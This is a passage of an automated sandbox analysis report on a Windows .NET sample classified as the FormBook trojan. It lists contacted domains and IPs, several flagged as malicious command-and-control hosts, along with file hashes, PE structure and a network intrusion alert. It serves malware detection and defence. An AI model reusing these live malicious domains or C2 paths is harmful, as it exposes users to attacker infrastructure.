                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.iqd964.com/p25s/www.allsttk.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.couldskuathink.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.adamdavisgroup.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jdyokum.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tjhymzz.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.desipizza.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pfokn.online/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.32612.xyzexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.adamdavisgroup.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.desipizza.ukReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.tjhymzz.com/p25s/www.blueskyinteractives.co.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.blueskyinteractives.co.ukReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fliparcher.store/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.anbietertest.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pfokn.onlineexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.carterandcone.comlSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.iftar.rsvpexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.founder.com.cn/cnSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.couldskuathink.com/p25s/www.tjhymzz.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.pfokn.onlineReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jdyokum.com/p25s/www.iftar.rsvpexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.anbietertest.com/p25s/www.hblcfl.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.pfokn.online/p25s/www.katkisiz.infoexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.adamdavisgroup.com/p25s/www.jdyokum.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.anbietertest.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
156.242.168.70 | www.hblcfl.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
45.195.140.44 | www.anbietertest.com | Seychelles | 133201 | COMING-ASABCDEGROUPCOMPANYLIMITEDHK | true
213.171.195.105 | www.desipizza.uk | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                          Analysis ID:810265
                                          Start date and time:2023-02-16 23:47:12 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 4s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@512/2@4/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 69.7% (good quality ratio 64.1%)
                                          • Quality average: 73.4%
                                          • Quality standard deviation: 30.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 46
                                          • Number of non-executed functions: 167
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.90.153.243, 20.90.152.133, 20.90.156.32
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:48:19 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe modified
23:49:01 | API Interceptor | 550x Sleep call for process: explorer.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.couldskuathink.com | Um3ueFKBTAVSPPS.exe | Get hash | malicious | FormBook | Browse | 168.76.71.70
www.desipizza.uk | wIQ8g7Sc7RrSm9l.exe | Get hash | malicious | FormBook | Browse | 213.171.195.105
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1427
                                          Entropy (8bit):5.36986752454013
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4q0E4KiZi:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzA
                                          MD5:2D2AD84A1FE79CB9BD5D55F458A9C23C
                                          SHA1:EEFC372DBF9D0B316A3E69DCFC3293C0E49ED42E
                                          SHA-256:126A3CFAAB3941D4DBDFE10B1216BB7519EAA950A6DF903E8D31AEABB754CBD6
                                          SHA-512:375720738963E9EA57D52F90582436705064AF9EB557713A12741520B1972A61157370E2BABC9ADAE8F0D91789FABE3A3CDD8673508002647988D328A775299C
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                          Process:C:\Windows\explorer.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):984
                                          Entropy (8bit):5.2414849034866355
                                          Encrypted:false
                                          SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                          MD5:4816271302882BDFB06EE40F624169D1
                                          SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                          SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                          SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                          Malicious:false
                                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.57277792108063
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
                                          File size:740864
                                          MD5:19a7c2a3f614a2f0c25065ed749eff53
                                          SHA1:fba7bde153caa8329cff3e906ea903402e51bc88
                                          SHA256:f8aa17381586d95eb4511d81932e4b53ddf5d3f17f8dc979f509ab94fe7cee64
                                          SHA512:ca3a8010ff908b42355e649eb322b4e85cb8262ddeef8daf76014272613dcd0ba87b36546cc5a30795f05a67a57cb1e7dfa5fcbd8c76fbba02f72434efba69c1
                                          SSDEEP:12288:qqzGPkZ9eklr7JRXfTyo7SRy0X6quo2SaATkVvJqo8SuRCUyo/MEAqDSugDs+9t:3YkhvvTejuo2lgkVvJq7SuQUjzAqDSu
                                          TLSH:30F48C8CC5F1EA3DEA898D7D331436081FE06A432A62C9F1D3E9F6C15B36263585D935
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............0..D...........c... ........@.. ....................................@................................
                                          Icon Hash:00828e8e8686b000
                                          Entrypoint:0x4b63ba
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x63EDE9E4 [Thu Feb 16 08:31:32 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6368 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x5cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb43c0 | 0xb4400 | False | 0.7556738145804438 | data | 7.5788906126167275 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x5cc | 0x600 | False | 0.431640625 | data | 4.137016367318869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xb8090 | 0x33c | data | |
RT_MANIFEST | 0xb83dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/16/23-23:50:26.920788 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.5 | 160.121.126.44
